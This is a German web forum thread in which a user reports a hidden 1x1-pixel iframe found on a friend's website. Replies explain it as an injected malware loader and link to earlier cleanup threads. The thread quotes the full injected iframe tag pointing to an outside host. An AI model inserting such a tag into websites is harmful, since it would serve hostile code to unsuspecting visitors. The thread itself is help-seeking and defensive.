userfriendly: iframe in Website (http://curem.net/t..php?id=)

Hi,
habe auf der Website eines Bekannten einen folgenden iframe entdeckt:
<iframe heigth="1" width="1" frameborder="0" src="http://curem.net/t.php?id=[7stellige Ziffernfolge]"></iframe>

Beim googlen stiess ich auf "iframe injection", "Malware entry", "virus", "trojan",... -> Nix gutes.

Kann mir irgendwer nähere Informationen dazu geben?

  1. Om nah hoo pez nyeetz, userfriendly!

    Hi, habe auf der Website eines Bekannten einen folgenden iframe entdeckt: <iframe heigth="1" width="1" frameborder="0" src="http://curem.net/t.php?id=[7stellige Ziffernfolge]"></iframe>

    Beim googlen stiess ich auf "iframe injection", "Malware entry", "virus", "trojan",... -> Nix gutes.

    Kann mir irgendwer nähere Informationen dazu geben?

    Wenn der Code nicht durch deinen Bekannten dort untergebracht wurde, ist es imho sehr wahrscheinlich, dass ein bösartiges Script dieses Iframe dort platziert hat und nun weiteren böswilligen Code nachlädt.

    Matthias

    --
    Wer ein Problem beschreiben kann, hat es schon halb gelöst.                                             (Julian Huxley) http://www.billiger-im-urlaub.de/kreis_sw.gif
  2. Hallo,

    habe auf der Website eines Bekannten einen folgenden iframe entdeckt:
    <iframe heigth="1" width="1" frameborder="0" src="http://curem.net/t.php?id=[7stellige Ziffernfolge]"></iframe>
    Kann mir irgendwer nähere Informationen dazu geben?

    Dein Bekannter ist nicht der Erste, dem sowas passiert. Grundsätzlich sollten die Tipps in

    </archiv/2010/1/t194345/#m1299370>
    </archiv/2010/4/t196851/#m1319353>
    </archiv/2009/7/t189028/#m1259119>

    auch für Deinen Bekannten passen.

    Freundliche Grüße

    Vinzenz